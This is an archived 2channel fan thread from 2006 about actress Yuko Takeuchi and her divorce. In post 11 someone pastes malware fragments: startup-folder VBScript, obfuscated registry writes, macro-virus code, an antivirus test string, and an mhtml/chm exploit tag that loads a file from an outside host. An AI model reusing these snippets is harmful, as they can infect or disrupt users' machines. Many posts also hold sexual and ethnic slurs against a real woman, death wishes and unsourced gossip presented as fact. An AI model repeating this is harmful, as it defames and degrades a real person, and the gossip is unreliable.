2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆女優・竹内結子を応援するスレ25☆

1 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:13:00 ID:76loSc7c

新しい結子さんの門出にあたり
ますます魅力的に輝く竹内結子さんをひきつづき応援します

前スレ
☆女優・竹内結子を応援するスレ24☆
http://tv7.2ch.net/test/read.cgi/actress/1151162953/l50


2 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:15:23 ID:grmOajxM
2かな

3 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:19:26 ID:MPlWohtT
離婚したって、マジ・・・

4 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:33:39 ID:yV8Wa+5f
DQNと結婚して子供まで作って、離婚。
案の定、子持のバツイチ。
見掛けだけのDQNに騙された女の典型例やん。

5 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:35:52 ID:PYiIodSR
いいぞ、ゆっこ!
応援するからな!

6 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:38:50 ID:ZoXBD5QC
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 || ○荒らしは放置が一番キライ。荒らしは常に2ちゃんねらーの反応を待っています。  
 || ○放置された荒らしは捏造や自作自演で2ちゃんねらーの反応を誘います。
 ||  ノセられて 援助したらその時点でDQNケテーイ。
 || ○荒らしの発言にレスすることは、荒らしの滋養にして栄養であり最も喜ぶことです。
 ||  波木井坊にエサを与えないで下さい   。    ∧ ∧
 || ○餓死するまで孤独に暴れさせておいて   \ (゚●●゚*) いいですね〜
 ||  何かしでかしたら征伐が一番です。       ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、ケツコ先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ  〜(___ノ


7 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:39:18 ID:w4MuY0dT
頑張れ ゆうコリン

8 :名無しさん@お腹いっぱい。:2006/11/01(水) 23:51:05 ID:ak7bX7GM
安部総理と同じく

竹内宿禰 を御先祖に持つ

結子様の陰口をたたく者に

天罰あれ

9 :名無しさん@お腹いっぱい。:2006/11/02(木) 00:01:41 ID:LH68ccJ5
ご先祖様のばちがあたったな結子、いい気味だ

10 :名無しさん@お腹いっぱい。:2006/11/02(木) 00:32:22 ID:BNNtsT9k
結子が最高!


6 を反映して

11 :<body onload=window()>:2006/11/02(木) 06:23:51 ID:mqpttbzD
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

12 :名無しさん@お腹いっぱい。:2006/11/04(土) 17:39:30 ID:syx1cIuM
↑ うざい

13 :名無しさん@お腹いっぱい。:2006/11/05(日) 12:25:04 ID:vedbl/f5
中村獅童は巨乳フェチで有名。離婚の理由はよくある性生活の不一致だと思います。実際、浮気相手二人ともかなりの巨乳だし…

14 :名無しさん@お腹いっぱい。:2006/11/05(日) 13:07:16 ID:RWe2mAV9
赤子ひり出す時に山の様な糞を出した女はこいつか。
さすが偏差値39だなww


15 :名無しさん@お腹いっぱい。:2006/11/05(日) 19:48:47 ID:+GI3k+dW
と、足腰立たなくなるまで毎日センズリこいてる童貞が申しておりますw

16 :名無しさん@お腹いっぱい。:2006/11/05(日) 22:15:07 ID:Z2A9RUBG
と2ちゃんねるに下品な書き込みするのが生きがいのさみしい不細工が申しております W

17 :名無しさん@お腹いっぱい。:2006/11/05(日) 23:48:33 ID:oisuvCow
赤子ひり出す時に尻穴から糞を山の様に出した女はこいつか。
さすが偏差値39だなww

18 :あぼーん:2006/11/06(月) 00:46:47 ID:wbJw5Cut
中村最悪

19 :名無しさん:2006/11/06(月) 12:45:37 ID:JR1F79Gy
獅童は最低かも知れませんが、子供の引き取りを要求しているらしい
ユーコちゃんには失望です。梨園というものをあまりにも理解してないと
思います。女優として再出発するならば、速やかに子供とは縁を切って
(どうせ、仕事するなら子供など自分では養育しないでしょうし)きれいな
状態で芸能活動するのがユーコちゃんのためにもなると思いますよ。

20 :名無しさん@お腹いっぱい。:2006/11/06(月) 22:32:37 ID:UyH7nH6m
と百貫デブのオバハンが申しておりますw

21 :名無しさん@お腹いっぱい。:2006/11/06(月) 23:19:31 ID:QPwzUrF2
↑いつもの馬鹿登場! W

22 :名無しさん@お腹いっぱい。:2006/11/07(火) 00:28:51 ID:592Bgf1a
と、からかわれたのが悔しくて眠れない人が申しておりますw

23 :名無しさん@お腹いっぱい。:2006/11/07(火) 00:32:17 ID:KsRoh72v
↑いつもの(後略)w

24 :名無しさん@お腹いっぱい。:2006/11/07(火) 02:02:58 ID:RrEHX7BL
赤子ひり出す時に尻穴から糞を山の様に出した女はこいつか。
さすが偏差値39だなww

25 :名無しさん@お腹いっぱい.:2006/11/07(火) 06:57:23 ID:BI8BkW68
獅童ママンは竹内に借金を申し込んでたみたいだね?
梨園って嫁のものは旦那のものだから、平気で竹内の車も夜這いに使ってたんだよね
保証人とかじゃなく、現金で数千万用意しろまで言われてびっくりして逃げたみたいだよ
しかしここにきて急展開ありそうで、最近急速に接近してきたエイベックスが
獅童の借金を肩代わりし、エイベックスの獅童として大々的に売り出す事が決まったらしい
竹内も今は伊豆の別荘で身内と水入らずだが、少しやりすぎたと反省しているらしく
借金の肩代わりの必要も無くなった今回は、ダスト側も容認し、どうやら離婚は撤回の見通しだ
エイベックスとしても今後は映画に力を入れていく為には獅童が必要らしく
もちろん竹内が妻であることも大前提であるらしい
今後はダストとエイベックスの協力で、夫婦共演での映画出演やCMが実現しそう
本当にただでは起きてこない男だけど、悪運強すぎ!よかったな獅童!




26 :名無しさん@お腹いっぱい。:2006/11/07(火) 10:32:53 ID:a8PZjg8O
出産時に糞が出るのは
珍しい事ではない。
分娩室入る前に浣腸するが、出てしまう事もある。みんなそうやって産まれてきたんだ。出産は命がけなんだぞ!
母ちゃんに感謝しろ!

27 :名無しさん@お腹いっぱい。:2006/11/07(火) 10:42:02 ID:592Bgf1a
そうやって苦労して産んだ子が2chの芸能人板に粘着し
嫌いな芸能人の悪口を書くのが生きがいのクソ人間になるんだから
母ちゃんも浮かばれない

28 :名無しさん@お腹いっぱい。:2006/11/07(火) 10:48:29 ID:KsRoh72v
太郎も糞人間になるのか竹内も浮かばれんな

29 :名無しさん@お腹いっぱい。:2006/11/07(火) 17:40:57 ID:592Bgf1a
お前の母ちゃんよりはマシだろう

30 :名無しさん@お腹いっぱい。:2006/11/08(水) 03:58:38 ID:ArZ51aFE
糞を床の上に山積みにしてひり出した餓鬼も将来は糞人間かw
竹内の人生もお先真っ暗だなww

31 :通行人さん@無名タレント :2006/11/08(水) 05:06:12 ID:oOwtpHc7
と糞を床の上に山積みにしてひり出された餓鬼が
ほざいてます。

32 :名無しさん@お腹いっぱい。:2006/11/08(水) 05:38:22 ID:OjAPp8SA
>>31
ダスト工作員乙www

33 :名無しさん@お腹いっぱい。:2006/11/08(水) 11:06:21 ID:uGLurUlD
俺も前に竹内程度の頭レベル(偏差値39位)と付き合った事があったけど、
あまりにチイチイパッパなんで本気で嫌になったな。。
まあ取り合えずヤリまくったけど。
獅童も一方的に悪く言われてかわいそうだよ。


34 :名無しさん@お腹いっぱい。:2006/11/08(水) 11:55:39 ID:FMZb+Nzo
とチイチイパッパに捨てられた男が申しております

35 :名無しさん@お腹いっぱい。:2006/11/08(水) 13:51:09 ID:+s/DzQzm
チイチイパッパに捨てられた彼は自慢できる程の偏差値なのか?

36 :名無しさん@お腹いっぱい。:2006/11/08(水) 14:04:38 ID:1I3d4jHY
どっちにしろ竹内はチイチイパッパ並みの賢さだということだよ

37 :名無しさん@お腹いっぱい。:2006/11/08(水) 15:21:40 ID:cTd3sbPW
チイチイパッパ?
意味がわからない。
じじい言葉ですか?

38 :通行人さん@無名タレント :2006/11/08(水) 15:35:24 ID:oOwtpHc7
チョン語だよw

39 :名無しさん@お腹いっぱい。:2006/11/08(水) 16:22:59 ID:1I3d4jHY
幼稚園児以下の学力レベルではわからんのもしょうがないか

40 :名無しさん@お腹いっぱい。:2006/11/08(水) 17:17:13 ID:FMZb+Nzo
と幼稚園児以下の学力レベルの人が自分をなぐさめております

41 :名無しさん@お腹いっぱい。:2006/11/08(水) 17:33:27 ID:cTd3sbPW
>>39
なるほど
あなたのようなバカな方が使う言葉なんだね


42 :名無しさん@お腹いっぱい。:2006/11/09(木) 01:09:54 ID:9E4Q8B06
離婚はありませんよ

43 :名無しさん@お腹いっぱい。:2006/11/09(木) 10:03:42 ID:kCtcwVbu
いま、会いにゆきます。

44 :名無しさん@お腹いっぱい。:2006/11/09(木) 21:20:57 ID:9E4Q8B06
最高だね

竹内結子

45 :名無しさん@お腹いっぱい。:2006/11/09(木) 21:37:02 ID:0PBp3h+F
ケツ内タケ子・・・確かに知的ではないな。
目を見るとこの女の知的レベルが低いのが良く判るよな。




46 :名無しさん@お腹いっぱい。:2006/11/10(金) 00:35:27 ID:SbNBywBI
↑ おまえのレスも激しく低脳だと分かる

47 :名無しさん@お腹いっぱい。:2006/11/10(金) 01:38:08 ID:LxdByqeO
竹内いい!マジ美人

48 :名無しさん@お腹いっぱい。:2006/11/10(金) 19:50:16 ID:4MZgktFV
   ,.,.,.,.,.,.,.,..,.,.
 ,;f::::::::::::::::::::::T
 i:::/'" ̄ ̄ヾ:::i
 |/ ,,,,_  ,,,,,,_ヾ|
 |=(三)=(三)=|
 { 、/( ,_、)ヽ |
. ',  .,ィェエヲ  ',
  ヽ___ /


49 :名無しさん@お腹いっぱい。:2006/11/10(金) 19:57:59 ID:W+rFOgg2
春の雪を見た友人によると、
竹内の演技もあんまり品がよろしくなかったそうなのだが
それより何より、顔が結構白塗りメイクだったので
鼻の穴が黒々と目立っちゃって、おまけに大スクリーン上だから
すごい大きさになっちゃってたらしい。ブラックホール状態で
そっちに気を取られて感動するどころじゃなかったそうだ

50 :名無しさん@お腹いっぱい。:2006/11/10(金) 20:11:03 ID:SbNBywBI
↑ それでも結子は、おまえの事なんか気にもとめない

51 :名無しさん@お腹いっぱい。:2006/11/10(金) 20:23:37 ID:W+rFOgg2
↑ それでも結子は、おまえの事なんか気にもとめない

52 :名無しさん@お腹いっぱい。:2006/11/10(金) 21:19:52 ID:SbNBywBI
↑だりーヤローだな
おめーわ


53 :名無しさん@お腹いっぱい。:2006/11/10(金) 21:49:03 ID:nNsWMqD6
>>49
クソワロタ ppp

54 :名無しさん@お腹いっぱい。:2006/11/10(金) 22:47:28 ID:WlGg75bH
竹内のブラックホールて通常の4倍は鼻糞が入ってそうだなw

キモ

55 :名無しさん@お腹いっぱい。:2006/11/10(金) 22:53:08 ID:Y5YWCRTP
竹内結子は主演ドラマ「不機嫌なジーン」の撮影期間の最中くらい、獅童とセックス我慢できなかったのかよ。
本当プロ意識の欠片もない女優だな。
超低視聴率ドラマの主役なのに、全く責任感を感じずに中出し三昧かよ
そんなに「しゃくれいんこ」と中田氏Hやりたくてしかたなかったのかよ?www

中高生のコギャルじゃあるまいし、「ゴム」くらい付けろよwww

このおまんこガバガバゆるゆるのメス豚淫獣www
行定監督も妻夫木も当然激怒。ダスト関係者は土下座までして平謝り。
本人は、わるびれず、挙げ句の果てには、
映画の試写会で謝罪の言葉なく、「竹内結子はいかがでしたか?」と脳天気に聞くバカ女。
当然、『春の雪』は話題にもならず大こけ。


466 :名無しさん@お腹いっぱい。:2006/10/27(金) 00:27:25 ID:wi0C58FH
自ら進んで35歳も年上の加齢臭がぷんぷんする毛むくじゃらの脂ぎった
キモジジイ初代仮面ライダー藤岡弘(NHK朝ドラ『あすか』で共演)を誘惑して、
その愛人になって毎日股を開いて脂ぎった藤岡弘のちんぽをしゃぶったり、
おまんこをさせていたドスケベ竹内結子
不潔だわ!
これも新聞に記載された事実。

見た目が田舎っぽいと「清純」「純粋」「大人しい」と
見られやすいけど、逆にそういう女の方が男好きのヤリマンが多い。


56 :名無しさん@お腹いっぱい。:2006/11/10(金) 23:11:14 ID:SbNBywBI
↑ 何を言っても構わないと思うが
気持ち悪い人ですね

57 :名無しさん@お腹いっぱい。:2006/11/11(土) 00:05:24 ID:/SyFTkiQ
http://oniti.sakura.ne.jp/055-1/02/takeuti5-102.jpg
子供の頃から鼻の穴がブラックホールですねww

58 :名無しさん@お腹いっぱい。:2006/11/11(土) 00:54:35 ID:8+n8Bvly
と子どもの頃から脳みそがブラックホールな人が申しております

59 :名無しさん@お腹いっぱい。:2006/11/11(土) 02:45:40 ID:p/6DokhL
↑おまえだろ W

60 :名無しさん@お腹いっぱい。:2006/11/11(土) 18:09:49 ID:4O9C+Vyk
http://oniti.sakura.ne.jp/055-1/02/takeuti5-102.jpg
餓鬼の頃から立派なブラックホールをお持ちですことww



61 :名無しさん@お腹いっぱい。:2006/11/11(土) 18:22:53 ID:6IqIc9Kb
性格わるすぎ〜傲慢おんな〜気強すぎ〜いい子ぶるな〜悪妻らしいです。

62 :名無しさん@お腹いっぱい。:2006/11/11(土) 22:59:52 ID:NfBLCuJ4
>>60
貴重な写真をありがとう!
待ち受けにさせていただきまんもすm(u_u)m

63 :名無しさん@お腹いっぱい。:2006/11/12(日) 22:00:11 ID:aYBFIKXx
黒穴結子

64 :名無しさん@お腹いっぱい。:2006/11/12(日) 22:36:25 ID:A0yiFDbw
と腹黒キモ子が申しております

65 :名無しさん@お腹いっぱい。:2006/11/13(月) 13:41:26 ID:bbsotGNi
竹内結子

なんでそんなに綺麗なの?

66 :名無しさん@お腹いっぱい。:2006/11/13(月) 21:53:50 ID:bbsotGNi
あなたが好きだから

67 :名無しさん@お腹いっぱい。:2006/11/13(月) 22:37:49 ID:xMexxY2f
この女ワキガですよ

68 :名無しさん@お腹いっぱい。:2006/11/13(月) 22:42:19 ID:WZdh9Iz8
ワキガ!!!
まぢ?

69 :名無しさん@お腹いっぱい。:2006/11/13(月) 22:52:51 ID:oRA7hUyT
それは激萌え!

70 :名無しさん@お腹いっぱい。:2006/11/14(火) 00:05:59 ID:N5BlFtag
>>67

かいたんか〜い

71 :名無しさん@お腹いっぱい。:2006/11/14(火) 03:08:47 ID:8iusmzCE
【速報】中村獅童今日放送「とくダネ!」で独占告白!泥沼闘争法廷へ?!

72 :名無しさん@お腹いっぱい。:2006/11/14(火) 19:47:36 ID:8iusmzCE
竹内悪妻伝説
(「アッコにおまかせ」より)

竹内は家事が出来ない。
家事もやらず、子育てもベビーシッターに任せっきりで
汚い散らかった部屋でタバコをスパスパ。
現在は、太郎は体が弱いのに、タヒチへ連れて行ったと獅童と獅童母は激怒。
歌舞伎公演中も、御贔屓筋に挨拶もろくにしなかった。
「挨拶しないといけないのなら、事務所を通して下さい。」
と言い放った竹内結子大女優様。

73 :名無しさん@お腹いっぱい。:2006/11/15(水) 03:51:40 ID:sDzyPRkR
>>72

ベビーシッターって悪いの?
部屋が汚いって見たんか?

ウワサをすぐに信じこむバカがいると聞いて、ここに来たのですがあなたでしたか?

74 :名無しさん@お腹いっぱい。:2006/11/15(水) 08:16:01 ID:2kAcoI5m
この夫婦は屑だ!どっちもどっち。

75 :名無しさん@お腹いっぱい。:2006/11/16(木) 00:37:35 ID:TAno7pVZ
と屑から生まれた屑子さんが申しております

76 :名無しさん@お腹いっぱい。:2006/11/16(木) 09:36:15 ID:50XN1I9W
↑いつもの(後略)w

77 :名無しさん@お腹いっぱい。:2006/11/16(木) 14:58:40 ID:9XMDqCOf
離婚は当然!
このままじゃ中村玉緒と同じイメージになっちゃうよ!

78 :名無しさん@お腹いっぱい。:2006/11/17(金) 01:08:54 ID:9xZPiwps
結子 love

79 :名無しさん@自治スレで板設定値議論中:2006/11/17(金) 12:01:22 ID:9xZPiwps
結子 cute

80 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 05:25:21 ID:QzaGbdN+
http://jp.video.msn.com/v/ja-jp/v.htm?g=e519db8f-7bcb-4cec-97d2-47a88e6acf10&f=imbot_ja-jp&fg=rss

81 :名無しさん@自治スレで板設定値議論中:2006/11/22(水) 07:16:27 ID:Rtu9xm1W
きもすぎ

82 :名無しさん@自治スレで板設定値議論中:2006/11/22(水) 13:23:05 ID:r3yO/B2g
だから鏡は見るなと

83 :名無しさん@自治スレで板設定値議論中:2006/11/22(水) 19:02:36 ID:5zyfFuEe
一般論だが、正面から見て鼻の穴がまともに見えるのはブス。

84 :名無しさん@自治スレで板設定値議論中:2006/11/22(水) 21:08:56 ID:Sn39fkjj
「明眸皓歯」て言葉がぴったしの美人さんですな

85 :名無しさん@自治スレで板設定値議論中:2006/11/24(金) 03:08:19 ID:K3O0Uqj1
んだんだ

86 :名無しさん@自治スレで板設定値議論中:2006/12/02(土) 10:57:41 ID:eeNTgJHf
吐き気がするくらい気持ちが悪い竹内結子の鼻の穴。
黒グロとしていて、グロテスク。
正面から見ても鼻の穴丸見えで、超ブサイク。(●●)
大して美人でもなく、演技も大してうまくない
芸なしドスケベ不倫略奪当たり前の中出しヤリマンゴリラ
中高年のオヤジを見ると、加齢臭でムラムラ発情して、
おまんこがたちまちびしょぬれになり、白い糸をひいて、すえた臭いのする
キムチ臭い劣化鶏ガラブサイクババア 竹内結子なんて早く死ねばいいのにwww
超ブサイクのブタゴリラ竹内ミソジを見ると吐き気が止まらないよw



87 :名無しさん@自治スレで板設定値議論中:2006/12/03(日) 00:07:02 ID:Z3I4QORL
みそじってw

88 :名無しさん@お腹いっぱい。:2006/12/07(木) 07:20:17 ID:uSwgrR3K
俺も結子が好きだから言う。
もう枕は卒業して実力でがんばろうな!!
応援してるよ!!



89 :名無しさん@お腹いっぱい。:2006/12/07(木) 17:22:04 ID:dmGMb1C9
ぶたばなだから無理だよ。

90 :名無しさん@お腹いっぱい。:2006/12/10(日) 02:36:34 ID:18+pjn27
はっきり言って不倫されたのは自業自得では?
自分もそうとうやってきたんだから、仕方無いだろう。
CMとか出てほしくない。テンション下がる。

91 :名無しさん@お腹いっぱい。:2006/12/10(日) 03:06:17 ID:eGnGTCww
竹内ファン求む、このアドレスに直接送ってくれ!
すべて無条件でmixiへ招待状送ってやるから!
support@gera-gera.com

92 :名無しさん@お腹いっぱい。:2006/12/10(日) 20:45:51 ID:VrUXRJuE
前歯 なが━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━い
肝付

93 :名無しさん@お腹いっぱい。:2006/12/13(水) 19:40:01 ID:f1crqjaw
鼻の穴から品のなさがうかがえる

94 :名無しさん@お腹いっぱい。:2006/12/14(木) 14:37:49 ID:k0pS8l7y
と全身から下品臭の漂うドブスが申しております

95 :名無しさん@お腹いっぱい。:2006/12/15(金) 09:22:52 ID:NaX8/P7F
おまえが下品な書き込みしてるしwww

96 :名無しさん@お腹いっぱい。:2006/12/15(金) 17:36:55 ID:v2OM/oxQ
どぶすのぶすこちゃん!

97 :名無しさん@お腹いっぱい。:2006/12/16(土) 01:20:05 ID:hU17EpMp
と鏡の前でつぶやく憐れな人

98 :名無しさん@お腹いっぱい。:2006/12/16(土) 02:08:06 ID:z3SH1p9c
不細工でちんちんしぼむー

99 :名無しさん@お腹いっぱい。:2006/12/16(土) 02:08:35 ID:x4QfGEtZ
と鏡の前でつぶやく憐れな人


100 :名無しさん@お腹いっぱい。:2006/12/16(土) 04:00:07 ID:iwpWNyJZ
早くやかれねぇかなぁ〜。子供ごと引き取っちゃうよ

101 :名無しさん@お腹いっぱい。:2006/12/16(土) 06:55:23 ID:z3SH1p9c
ぶたばな整形してほしい

102 :名無しさん@お腹いっぱい。:2006/12/16(土) 13:05:49 ID:hU17EpMp
↑と鏡の前でつぶやく憐れな人

103 :名無しさん@お腹いっぱい。:2006/12/16(土) 18:48:52 ID:z3SH1p9c
ぶたばな死んでほしい

104 :名無しさん@お腹いっぱい。:2006/12/16(土) 19:06:29 ID:HmUJrjkG
『ランチの女王』の続編希望!当時のキャストを難しいけど全員そろえたかたちで観たいよ〜

105 :名無しさん@お腹いっぱい。:2006/12/16(土) 19:26:34 ID:5o9EqpFr
オモシロクナイダロウネ

106 :名無しさん@お腹いっぱい。:2006/12/17(日) 12:48:52 ID:CdlGxEtm
女王のレストラン糞ツマンネ 苛々した

107 :名無しさん@お腹いっぱい。:2006/12/19(火) 16:12:27 ID:Sz5gSPdX
TSU●AYAで、いま会いにゆきます。と春の雪がレンタル落ちされていました
いま会いが300円、春の雪が200円でした。
たしか、いま会いのだいぶ後で妊娠?春の雪ではお腹がかなり目立ってたと聞きましたが?にしても、悪名高いやしきたかじんが
竹内さんとまだ夫の獅堂さん?ですよね?
随分前に離婚と発表してた割にはまだ夫婦なんですよね?
で、悪名高いたかじんが竹内さんが腰をくねらせ両手を降り一緒に踊り飲んだと関西ローカルで自慢してましたが
妊娠中に凄いな〜どと思うた
しかしあんなたかじんに気に入られてもちょっとアレですよね?女優も大変ですね。

108 :名無しさん@お腹いっぱい。:2006/12/20(水) 09:35:13 ID:tikd9w4b
お前の日本語も大変だな

109 :名無しさん@お腹いっぱい。:2006/12/20(水) 14:40:29 ID:trUHxnD4
今あい300円  W

110 :名無しさん@お腹いっぱい。:2006/12/20(水) 15:34:53 ID:WUFqu8wg
>>107
たかじんは、身重の竹内には躍らせなかったって関西ローカルで言ってたよ。
それアサ芸のネタ

111 :名無しさん@お腹いっぱい。:2006/12/21(木) 01:19:50 ID:N9DF6aOG
今月の『Spring』の表紙になってるけど、このタイミングでこいつを
カバーにもってくる方ももってくる方だが、受ける方も受ける方だ。
しかしあれだけ騒がれても、CMを平気で流し続けてるJOMOも不思議。

112 :224:2006/12/21(木) 01:26:06 ID:bRdfMxgG
女性週刊誌(自身orセブン)に竹内が携帯の画面を見ている写真がアップで出ていたのですが、
鼻の穴(むかって右だったかな?)の奥が写りすぎて、あたかも鼻水がでているみたいな写真が掲載されているのを見ましたよ。
ほかに、見た人いない?
かなりキテいる写真。
一瞬、なにごとかと思いましたよ。

113 :名無しさん@お腹いっぱい。:2006/12/21(木) 03:04:31 ID:qMH89w8W
とキテる人が申しております

114 :名無しさん@お腹いっぱい。:2006/12/21(木) 11:57:41 ID:JToHXpwn
>>111
結子がなにか犯罪でも犯しました?
騒がれて世間様に迷惑かけましたかしら?
離婚してシングルマザーになる人は雑誌の表紙もCMもでちゃいけないとでも?
そんな思考回路の人の方が不思議でならないですねえ


115 :名無しさん@お腹いっぱい。:2006/12/21(木) 12:44:44 ID:qMH89w8W
↑キチガイニマジレスカコワルイ

116 :名無しさん@お腹いっぱい。:2006/12/21(木) 13:51:15 ID:wHH9EdMM
あいつのデキ婚がかなりまわりをふりまわし、子供を不幸にしたのは事実。雑誌の表紙ね、また売れ残り決定!

117 :名無しさん@お腹いっぱい。:2006/12/21(木) 14:14:41 ID:q+Oklift
竹内大嫌い

118 :名無しさん@お腹いっぱい。:2006/12/21(木) 14:36:34 ID:qMH89w8W
↑と鏡の前でつぶやく憐れなドブス


119 :名無しさん@お腹いっぱい。:2006/12/21(木) 14:39:56 ID:WIEv9YbU
>>118
噛み付きヲタ

120 :名無しさん@お腹いっぱい。:2006/12/21(木) 14:43:01 ID:yhzZcTTY
父親がいないからそれだけで即子供が不幸という思考回路もいかがなものかと。
私は父親の分も頑張る母を応援したいですね。

121 :名無しさん@お腹いっぱい。:2006/12/21(木) 18:53:39 ID:wHH9EdMM
誰も応援してないとは言ってない。被害妄想もはなはだしい。

122 :名無しさん@お腹いっぱい。:2006/12/22(金) 01:08:46 ID:k2A2AIO9
携帯CMは映画化されるの?次回作は行定作品?

123 :名無しさん@お腹いっぱい。:2006/12/22(金) 19:41:42 ID:O66bvO3N
スプリングのカバーの不細工誰かと思ったら竹内だったわ

124 :名無しさん@お腹いっぱい。:2006/12/22(金) 20:03:33 ID:r15IUJPN
猿 以下

125 :名無しさん@お腹いっぱい。:2006/12/22(金) 20:13:21 ID:6Ir1GCax
↑と鏡の前でつぶやく憐れなドブス



126 :名無しさん@お腹いっぱい。:2006/12/22(金) 21:07:08 ID:O66bvO3N
↑おおブス

127 :名無しさん@お腹いっぱい。:2006/12/22(金) 22:30:53 ID:r15IUJPN
同じレスしかできず
哀れ

128 :名無しさん@お腹いっぱい。:2006/12/22(金) 22:37:31 ID:6Ir1GCax
と大陸顔のブスがほざいてます。

129 :名無しさん@お腹いっぱい。:2006/12/22(金) 23:30:18 ID:O66bvO3N
↑おおブス ドアホ W

130 :名無しさん@お腹いっぱい。:2006/12/22(金) 23:31:08 ID:6Ir1GCax
↑日本語でおk

131 :名無しさん@お腹いっぱい。:2006/12/23(土) 03:12:16 ID:ACLJWTC/
↑ばか  簡単な日本語ならわかりますか? W

132 :名無しさん@お腹いっぱい。:2006/12/23(土) 03:13:54 ID:Iz9QNqsw
↑日本語でおk

133 :名無しさん@お腹いっぱい。:2006/12/23(土) 03:16:38 ID:1nCCJZSi
最近の彼女は電通にのせられるかのように思考回路が操られてて
今の自分を演じてて寒い。芸能記者らに影響されすぎ。
事務所の思惑通りになってどうする。お前は駒か。

134 :名無しさん@お腹いっぱい。:2006/12/23(土) 10:08:46 ID:3avNgZZo
と2chにのせられている愚かな人が申しております

135 :名無しさん@お腹いっぱい。:2006/12/23(土) 10:28:10 ID:f8IIGDq+
早く竹内結子ちゃんのドラマ見たいな

136 :名無しさん@お腹いっぱい。:2006/12/23(土) 20:03:20 ID:G13MLR+R
私も〜。

結子大好き〜〜〜。

137 :名無しさん@お腹いっぱい。:2006/12/23(土) 21:28:58 ID:3aEiWC93
映画にドラマにCMに どんどん活躍してほしい

私もチョコのお家の乗ったクリスマスケーキ食べるぅ

138 :名無しさん@お腹いっぱい。:2006/12/24(日) 01:58:08 ID:2/bE7KZo
うんうん、どんどん活躍してほしい!!

竹内、最高。

139 :名無しさん@お腹いっぱい。:2006/12/25(月) 08:47:36 ID:BN8UFabV
最高!
でもない

140 :名無しさん@お腹いっぱい。:2006/12/25(月) 11:06:01 ID:+J50PXXA
ガキと心中すればいいよ

不幸な女

141 :名無しさん@お腹いっぱい。:2006/12/25(月) 11:15:09 ID:tdcGFKMz
↑オマエが氏ね

142 :名無しさん@お腹いっぱい。:2006/12/25(月) 11:37:17 ID:XSrTbfRQ
http://urlcutter.com?9994

143 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:40:52 ID:x4Xq8w2a
【迷惑】「おすすめ2ちゃんねる」反対!【悪害】
http://pc8.2ch.net/test/read.cgi/internet/1166603581/

144 :名無しさん@お腹いっぱい。:2006/12/26(火) 06:36:00 ID:UEW6xWzb
新CM
すっかり老けたね。面影がなくなった。映像も暗くて更に竹内さん自体から暗さが出てくる根暗な部分がよけい…
長い髪の毛がベットリしてて
ホラー映画のよう。
ベッドシーンもラブホテルのようないやらしさが。ねっとりした感じだ。



145 :名無しさん@お腹いっぱい。:2006/12/26(火) 14:02:46 ID:3CyBQv4u
年内離婚、年明け発表なんて書いてる週刊誌と法廷闘争なんて書いてるのもある。さてどっちでしょう?

146 :名無しさん@お腹いっぱい。:2006/12/26(火) 14:33:59 ID:oMWXvGhF
新CM開始は1月1日からなんだって! お正月楽しみ〜 

147 :名無しさん@お腹いっぱい.:2006/12/26(火) 17:12:26 ID:hjf0NfNT
結局事故だったんじゃない!彼女当時月9の出だしいまいちでイライラしてた頃
例の獅童のポエムメールに引っかかり、いま会いのキャラでまんまと騙され
お互いに相手がいるものの気がついたら妊娠発覚、反社会的行為の堕胎も個人の
理由で拒絶し、芸能人で在るが故の偽装結婚状態に陥った。
最初から終焉が計画された仮面夫婦生活に獅童が我慢出来るはずも無く
結婚前より素行が荒れだし、終始行動や言動に対して静観視してきた竹内サイドが
急に動きだしてきた。妊娠期間前後も二人で行動を共にした事実は数えるくらいしかなく
最初から最後までほとんど二人だけでの生活はしていなかった模様
獅童が何故、囲み会見などで家族に対しても嘘が多いのは、後で辻褄が合わない
事で喧嘩になるほどの夫婦生活に実態が無かったからであろう
もともと獅童が遊びで竹内を手に入れたいが為の行動が、誤って結婚までに至り
旬な竹内の女優生命までも奪った。一時は復帰の事や自分の子供の将来への不安、そして獅童の事件
などで食事も喉が通らないほど悩みぬいたが、気丈な覚悟で現実を受け止め
